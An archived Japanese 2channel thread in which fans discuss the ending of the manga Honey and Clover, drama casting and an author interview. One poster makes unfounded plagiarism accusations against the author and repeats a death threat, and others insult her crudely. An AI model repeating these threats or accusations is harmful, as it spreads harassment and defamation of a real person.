あのぴあのに出ました

124 :高橋佳子:2006/12/19(火) 17:19:16 ID:a/cikvY4O
阪大出の美人なので話題もなります

125 :高橋佳子:2006/12/19(火) 17:20:56 ID:a/cikvY4O
宇宙飛行仕の話は全部私の盗作です
海野をたいほしろ

126 :高橋佳子:2006/12/19(火) 17:21:49 ID:a/cikvY4O
半座石ないのがふしぎだ
そのうちする

127 :高橋佳子:2006/12/19(火) 17:22:58 ID:a/cikvY4O
漫画家になれるんで売春して状況したら海野のせいで駄目になった

128 :高橋佳子:2006/12/19(火) 17:24:47 ID:a/cikvY4O
精神病気は漫画家になれなきゃなおらない

129 :花と名無しさん:2006/12/19(火) 22:18:12 ID:JVAUBzPqO
マンマー頭のおかしな人がいるよー(´・ω・`)

130 :名無し:2006/12/19(火) 22:35:19 ID:oOTbYJzKO
私はあゆ好きです!
切ない片想いでも頑張ってる姿とか!!!!

131 :花と名無しさん:2006/12/19(火) 22:59:50 ID:x9b8dG0BO
>>129
ポクーあんな変な人は見えないふりするのよー

132 :花と名無しさん:2006/12/19(火) 23:10:57 ID:???O
ピーター以外みんな死んじゃっていいよ

133 :花と名無しさん:2006/12/20(水) 08:40:46 ID:d+CkTtoG0
うぐぅ

134 :花と名無しさん:2006/12/20(水) 15:31:52 ID:???0
スピンオフとやらを立ち読みしてきたぜ

135 :花と名無しさん:2006/12/20(水) 17:41:59 ID:???O
遅ればせながら、やっと10巻入手。迂濶にも泣けてしまった…。
あの「クローバ」を使ったアノ場面ね(ネタバレ?)。

ってか、『ハチクロ』を集めるきっかけになった『星のオペラ』が載ってて嬉しかったな。
またまた泣いちまった。

136 :花と名無しさん:2006/12/20(水) 19:47:18 ID:???0
ちょ、ネタバレすんなよ!w

137 :花と名無しさん:2006/12/21(木) 00:06:17 ID:???0
過疎化

138 :花と名無しさん:2006/12/21(木) 09:26:46 ID:???0
モスカーの季節ですね

139 :花と名無しさん:2006/12/21(木) 14:34:22 ID:???O
今頃、ローマイヤー先輩は何してるのかなぁ〜(´・ω・`)ふぅ

140 :高橋佳子:2006/12/21(木) 15:09:21 ID:3UbhvwXjO
宇宙飛行士の話をぱくられた
訴えてやる
私には中村うさぎや岩井志麻子が味方がある
覚悟しとけ

141 :花と名無しさん:2006/12/22(金) 02:32:16 ID:1R26gKv2O
スキッリしないというか 最初は好きで読んでたけど 最後の9.10で嫌になった

142 :花と名無しさん:2006/12/22(金) 04:02:52 ID:???0
腐った卵の臭い↑臭い↑

143 :花と名無しさん:2006/12/22(金) 07:44:56 ID:???O
>>140
(゚д゚){えっ…]

144 :花と名無しさん:2006/12/22(金) 15:37:12 ID:???0
宇宙飛行士の話って?

145 :花と名無しさん:2006/12/22(金) 18:06:16 ID:eTf26iytO
へんなひとがまたいるよーヾ(´・ω・`)

毎度毎度、乙ッ☆



146 :花と名無しさん:2006/12/22(金) 18:08:10 ID:???0
他の漫画の帯によくコメント書いてるね
そんなことしてるんだったら漫画の腕を磨けよ

147 :花と名無しさん:2006/12/22(金) 18:11:13 ID:???0
クリエーターに寄生して生きる、漫画も描けるよくわからない人になっちゃうよ!

148 :花と名無しさん:2006/12/24(日) 18:35:18 ID:Nzfwkd2DO
クリスマス・イブ保守

149 :花と名無しさん:2006/12/24(日) 19:04:37 ID:???O
>>141
どの辺りが嫌いなのかな?
既出かも知れないが、少し教えてもらいたいですね。

はぐが「予想した人」とくっつかないトコとか?

150 :花と名無しさん:2006/12/24(日) 23:51:37 ID:???O
>141 じゃないんですけど、同じ様に思ったので…
なんか、ストーリーの展開が思い通りにかないとかそんなあたりまえな理由で嫌だと思ったりしませんよ。
展開が急です。なんでそんなに終りを急ぐのかわかりませんが…え?てなりました。読者のわがままなのかもしれませんが…もうちょっと描くことあるんじゃないかとか初期のキャラ設定無視?とか疑問に感じることが多々ありました。

151 :花と名無しさん:2006/12/25(月) 01:37:36 ID:???0
>>134 誰がメインの話なんですか?気になるけど
読みに行くのがメンドイので。

152 :花と名無しさん:2006/12/25(月) 10:09:57 ID:???0
ハチクロドラマ化。
はぐ=宮崎あおい
竹本=小池徹平
あゆ=水川あさみ
森田=V6井ノ原

153 :花と名無しさん:2006/12/25(月) 10:29:04 ID:9m+eUDsNO
羽海野チカのうんこ公衆のコピペしようぜ!

154 :花と名無しさん:2006/12/25(月) 11:11:59 ID:???O
>>150
読者としては、もっと続いて欲しいのは確かだよね。
でも、美大を舞台にしてる以上、タイムリミットは付きものでしょう。
イベントネタは何回繰り返し出来ないし…季節感も考えないと。
作品が雑誌の休刊→移籍したのも影響あるかもね。

「物語の展開が“突然”すぎ!」ってのも、ある意味「展開が自分の思い通りじゃない」と似てるかもね。


155 :花と名無しさん:2006/12/25(月) 12:21:25 ID:???0
>>154
>141でも>150でもありませんが>>154のいってることは
全て問題のすり替えだと思います
ちゃんと春に終わったわけでもないのに季節感がどうとか言われてもネェ・・・
1話完結で季節通りに進んできたマンガでもないのにww

それに>>141は9巻10巻で嫌いになったと言っている以上、なにか気に入らない
展開だったことは言うまでもないわけだけで・・・
どの辺が嫌いなのかな?とか聞いといて展開が自分の思い通りじゃないからって
暴れるなよっつーのはどうなのよ





156 :花と名無しさん:2006/12/25(月) 12:30:52 ID:???0
>>154
>>150は今まで丁寧に描かれてきた物語が最後でいきなり今までの設定を
壊して急展開→終結したことを批判してるんだと思うよ。
いつまでもダラダラ続いてほしかったと言っているわけではないとおもうよ。


157 :花と名無しさん:2006/12/25(月) 12:44:06 ID:???0
8巻までは、まだ、せつない苦しいながらもさわやかだった。
9,10巻は、ドロドロしてた。
普通にそう感じて141に共感してるけど。

158 :花と名無しさん:2006/12/25(月) 14:26:47 ID:???O
>156
そのとおり、ありがと。

159 :花と名無しさん:2006/12/25(月) 17:13:55 ID:???O
真山さえいなきゃ かなり楽しめた・・・・
いても別にいいけど
あの 俺は大人!みたいな 雰囲気でまくが ムカついた
しんでほしい 犯罪者

160 :花と名無しさん:2006/12/25(月) 19:48:28 ID:???O
>>155-156
う〜ん…
つまり、森田兄弟やはぐの「昔から抱いてた想い」がドロドロで好かんと。要らないと。
もっと爽やか作品を描けと。

人間キレイなだけってのも、何だかなぁ…。

161 :花と名無しさん:2006/12/25(月) 20:19:50 ID:???0
>>154-160
いや…だから何でそんなナナメ上な解釈をして
勝手に総括しようとしてんの?



162 :花と名無しさん:2006/12/25(月) 20:53:08 ID:???O
最初からはぐや森田を「神格化」してるのが解らない。

先生だって「今まで父親代わりだったから、ずっとそう在るべき」みたいな見方とか。
身近なら余計にストレートに出せないだろう…。

163 :花と名無しさん:2006/12/25(月) 23:46:27 ID:???O
>>156
設定崩れって?

164 :花と名無しさん:2006/12/26(火) 03:11:14 ID:???0
>>162
神格化の元凶は羽海野さんだもんなぁ。キャラの設定でそう読ませていた。
ファンタジーだから許せるヌルイ設定の中で、9巻10巻は羽海野さんの嗜好の生臭さが目立つ。
遠慮なく自慰にふけりはじめたのを見てヤバイんじゃないかと思っていたが、はぐで駄目押しされた。
自慰の言い訳のためにキャラクターに説明台詞を吐かせ、
整合性を取ろうと不自然な行動をさせてしまっている。

165 :花と名無しさん:2006/12/26(火) 04:03:30 ID:???0
>>162
9巻10巻を読んで設定の崩れを感じない人に説明するのムリだなー
その愚鈍さが逆にうらやましいよ

166 :花と名無しさん:2006/12/26(火) 05:16:18 ID:???0
ウミノさんのブログみてきた
なんだかとても淋しい気持ちになった
すごくご両親に対する精神的な依存度が高くて心配になった
あれをご両親が目にしたらさぞかし心配するのではないだろうか

ウミノさんくらいの年齢になると親も老いが目立ってきて心配になる反面、多くの場合
新しい家族がいて、子育てにも忙しくなかなか親を気遣う余裕がないものだよなぁ…
でもそうやって元気に暮らしてることこそが親孝行になるのかなとも思う

ウミノさんもあんな淋しい淋しい言ってたらご両親もさぞかし心配だろう
多くの人が目にするメディアでメソメソと弱音ばかりはいてないで
カラ元気でもいいからもっとドンとかまえてご両親を安心させてあげてほしいと
人ごとながら思った

167 :花と名無しさん:2006/12/26(火) 10:24:56 ID:???0
アニメから入って、昨日原作漫画を読み終えたので記念カキコ。
最後のクローバーサンドイッチで、涙が出そうになったよ。
結局、主要5人メンバーの中では、カップルはできないんだね。
それもまた、「青春じゃああああああ!!!!!」
てところなのかな。

168 :花と名無しさん:2006/12/26(火) 11:42:16 ID:???0
>>165
はげどう。

推理小説だと思って読んでいたけど、犯人が物語に全く絡まない
通りすがりの人だった。って結末を読んだ気分。
私だったら今まで読んできたものはなんだったの、ってがっかりするけど
どこが悪いの?って思う人だっているもんね。




169 :花と名無しさん:2006/12/26(火) 12:24:32 ID:???O
>>165
愚鈍だから解らないな。

「今まで父親代わりだった男に好かれたくない!」ってのはあなたの考えでしょう?作品中で「対象外」に決めてたのも。
はぐにとっては、最初から信頼してる「心の拠」的な存在じゃね?

170 :花と名無しさん:2006/12/26(火) 15:14:37 ID:???O
そうだね、そうだね

171 :花と名無しさん:2006/12/26(火) 15:32:11 ID:???0
>>169は優等生な羽海野ファンなんだな。
だけど169のような存在が羽海野の糧になってるかはまた別の話。

172 :花と名無しさん:2006/12/26(火) 16:41:01 ID:???0
確かに>>169の言う事は判るんだけど、修ちゃんの件に関しては、散々はぐみを見守る位置表現がされていたから
いきなりの急展開に見えてしまうんだよね、どうしても…
ウミノさんがずっとこういう展開にしようと考えていたのならもう少し丁寧にそれを表現してほしかった
別に今まで父親代わりだった男に好かれてもいいと思うよ、それが納得いくような描写であったなら

スピンアウトであゆと野宮がラブラブっぽかったのでちょっと萌えたよ

173 :花と名無しさん:2006/12/26(火) 20:15:27 ID:???0
私は修はぐはダメだなー
オムツかえてた親戚の女の子に恋愛感情持つ男はリアルにいてもヤバイ気がする

ストーカー真山と意気投合して徹夜将棋してるのみてなんか…な気分に…
そういえば相手が弱っているところにつけ込む手口は同じだったなとか思えて…トホホ

174 :花と名無しさん:2006/12/26(火) 22:59:17 ID:Qzf23LT/O
DVDかたよ〜(・∀・)/
カバーの森田さん色っぽい… 萌 


175 :花と名無しさん:2006/12/27(水) 00:26:45 ID:???O
コメディーとして読んでるオレは勝ち組

176 :花と名無しさん:2006/12/27(水) 00:55:53 ID:???O
まだ作者がどうの言ってるやついんだ
どっかにウミノスレでも立ててそっちでやれよ
キモすぎw

177 :花と名無しさん:2006/12/27(水) 00:58:40 ID:ptqMY/SWO
>>173
気づいてない本当にヤバい犯罪者 真山
ちょっと人と恋愛感覚がズレテル 花本先生

二人とも 気づいてないから よく一緒にいるんだよ

178 :花と名無しさん:2006/12/27(水) 05:07:13 ID:???O
ピーター・ルーカス大好きぃ☆(・д←>)

179 :花と名無しさん:2006/12/27(水) 09:26:52 ID:???0
コメディとして読んでたのに裏切られたから腹立つのり

180 :花と名無しさん:2006/12/27(水) 10:36:31 ID:???O
あのマンガでこんなに語れるなんてすごいね。
いや、関心してるの。
楽しかったけどさぁ。
みなさんしっかり読み込んでるんだね。

181 :花と名無しさん:2006/12/27(水) 11:22:44 ID:???0
竹本一人旅あたりまでは何度も手に取り読みかえすマンガだったなー

182 :花と名無しさん:2006/12/27(水) 18:38:12 ID:???0
うちもキノコミックス作ろう!!!

183 :高橋佳子:2006/12/27(水) 19:41:08 ID:GW3ZQBTuO
ころてやる

184 :高橋佳子:2006/12/27(水) 19:42:26 ID:GW3ZQBTuO
ころてやる

185 :高橋佳子:2006/12/27(水) 19:43:28 ID:GW3ZQBTuO
ころてやる

186 :高橋佳子:2006/12/27(水) 19:44:35 ID:GW3ZQBTuO
ころてやる

187 :高橋佳子:2006/12/27(水) 19:45:52 ID:GW3ZQBTuO
ころてやる

188 :花と名無しさん:2006/12/27(水) 20:57:43 ID:0sc3LEVxO
ころてやるぉ〜(´・ω・`)

189 :花と名無しさん:2006/12/28(木) 07:06:41 ID:???O
ころてやるっ何?

190 :花と名無しさん:2006/12/28(木) 11:05:59 ID:???0
ねえねえみなさん、ドラマ化するとしたら誰がどの俳優がいい?

191 :花と名無しさん:2006/12/28(木) 15:49:07 ID:QfRjmuaGO
はぐ→あおいゆう
あゆ→サトエリ
竹本→小池てっぺー
森田→玉鉄
真山→玉木宏
修司→さかいまさと

自分が好きなキャスト。あゆは絶対にサトエリじゃないとやーだー


192 :花と名無しさん:2006/12/28(木) 16:38:18 ID:???0
( ´,_ゝ`)

193 :花と名無しさん:2006/12/28(木) 21:44:12 ID:???0
あゆは山田優が良かった
蹴りとかできそうだし

194 :花と名無しさん:2006/12/28(木) 21:53:09 ID:???0
( ´_ゝ`) (´<_` )

195 :花と名無しさん:2006/12/28(木) 22:22:32 ID:???0
2月発売(4月号)のメロディーでよしながふみとの対談が載るらしい
買おうかな

196 :花と名無しさん:2006/12/29(金) 02:12:40 ID:???0
また対談か

197 :花と名無しさん:2006/12/29(金) 11:18:51 ID:???0
天然ちゃんのウミノと優等生のよしなが……
見たいような見たくないような。

198 :花と名無しさん:2006/12/29(金) 12:06:44 ID:???0
喋るのが仕事かよ
おばちゃんワイドショーでくっちゃべってりゃいいのに

199 :花と名無しさん:2006/12/29(金) 21:04:12 ID:???O
よしながふみも801同人出身だよね

200 :花と名無しさん:2006/12/29(金) 22:53:24 ID:???0
よしなが:三井×木暮
ウミノ:花形×藤真

この背景を知っていればおk

47 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)